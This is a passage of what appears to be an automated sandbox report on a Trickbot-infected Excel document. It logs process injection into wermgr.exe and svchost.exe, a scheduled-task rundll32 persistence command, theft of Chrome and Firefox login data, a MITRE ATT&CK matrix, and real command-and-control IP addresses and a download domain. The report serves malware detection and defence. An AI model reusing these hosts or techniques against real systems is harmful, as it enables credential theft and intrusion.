                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800836A4 GetSystemInfo,
                Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformation
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00073070 LdrLoadDll,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E15B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\System32\svchost.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E15B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E157DE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00082060 SetCurrentDirectoryW,SleepEx,SetTimer,RtlAddVectoredExceptionHandler,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write
                Hijacks the control flow in another processShow sources
                Source: C:\Windows\System32\wermgr.exeMemory written: PID: 2296 base: 180106000 value: FF
                Writes to foreign memory regionsShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: 60000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: FFC993F8
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: FF0E246C
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180001000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180001000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 1800DC000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 1800DC000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180106000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180106000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 18010C000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 18010C000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180113000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180113000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 2C0000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 180000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 300000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 1F30000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 1F50000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\svchost.exe base: 70000
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\System32\wermgr.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor7737977537\rpBASEtx.rrd',DllRegisterServer
                Source: wermgr.exe, 00000006.00000002.2357397155.0000000000860000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: wermgr.exe, 00000006.00000002.2357397155.0000000000860000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: wermgr.exe, 00000006.00000002.2357397155.0000000000860000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Windows\System32\wermgr.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 2408, type: MEMORY
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2094061002.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2089754481.00000000006C4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2089764139.00000000006C4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2094284509.0000000000690000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2094761896.0000000002198000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
                Source: C:\Windows\System32\wermgr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultSecurityPreloadState.txt
                Source: C:\Windows\System32\wermgr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultcompatibility.ini
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\System32\wermgr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultAlternateServices.txt
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
                Source: C:\Windows\System32\wermgr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultSiteSecurityServiceState.txt
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                Remote Access Functionality:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 2408, type: MEMORY
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2094061002.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2089754481.00000000006C4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2089764139.00000000006C4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2094284509.0000000000690000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2094761896.0000000002198000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting21DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools2OS Credential Dumping1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API1Boot or Logon Initialization ScriptsExtra Window Memory Injection1Scripting21LSASS MemorySystem Information Discovery115Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution33Logon Script (Windows)Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Process Injection312DLL Side-Loading1NTDSSecurity Software Discovery12Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsVirtualization/Sandbox Evasion1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol114Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading121Cached Domain CredentialsProcess Discovery4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemSystem Network Configuration Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 355598 Sample: SecuriteInfo.com.Exploit.Si... Startdate: 20/02/2021 Architecture: WINDOWS Score: 100 45 190.239.34.181 TelefonicadelPeruSAAPE Peru 2->45 47 154.0.134.130 RTL-ASUG Uganda 2->47 49 4 other IPs or domains 2->49 65 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->65 67 Found malware configuration 2->67 69 Antivirus detection for URL or domain 2->69 71 13 other signatures 2->71 10 EXCEL.EXE 84 41 2->10         started        15 taskeng.exe 1 2->15         started        signatures3 process4 dnsIp5 57 www.chipmania.it 10->57 59 chipmania.it 185.81.0.78, 49165, 80 SERVERPLAN-ASIT Italy 10->59 35 C:\Users\user\BASE.BABAA, PE32 10->35 dropped 37 C:\Users\user\AppData\Local\...\10[1].jjkes, PE32 10->37 dropped 87 Document exploit detected (process start blacklist hit) 10->87 89 Document exploit detected (UrlDownloadToFile) 10->89 17 rundll32.exe 10->17         started        19 rundll32.exe 15->19         started        file6 signatures7 process8 process9 21 rundll32.exe 17->21         started        signatures10 73 Writes to foreign memory regions 21->73 75 Allocates memory in foreign processes 21->75 24 wermgr.exe 4 8 21->24         started        28 wermgr.exe 21->28         started        process11 dnsIp12 51 185.109.54.99, 447, 49174 OT-ASRO Ukraine 24->51 53 94.140.114.136, 443 NANO-ASLV Latvia 24->53 55 8 other IPs or domains 24->55 77 Hijacks the control flow in another process 24->77 79 Tries to harvest and steal browser information (history, passwords, etc) 24->79 81 Writes to foreign memory regions 24->81 30 svchost.exe 13 24->30         started        83 Tries to detect virtualization through RDTSC time measurements 28->83 85 Found evasive API chain (trying to detect sleep duration tampering with parallel thread) 28->85 signatures13 process14 dnsIp15 61 116.68.162.92, 443, 49176 SDI-AS-IDPTSumberDataIndonesiaID Indonesia 30->61 39 C:\Users\user\AppData\Local\...\Web Data.bak, SQLite 30->39 dropped 41 C:\Users\user\AppData\...\Login Data.bak, SQLite 30->41 dropped 43 C:\Users\user\AppData\Local\...\History.bak, SQLite 30->43 dropped 63 Tries to harvest and steal browser information (history, passwords, etc) 30->63 file16 signatures17

                Screenshots

                Thumbnails

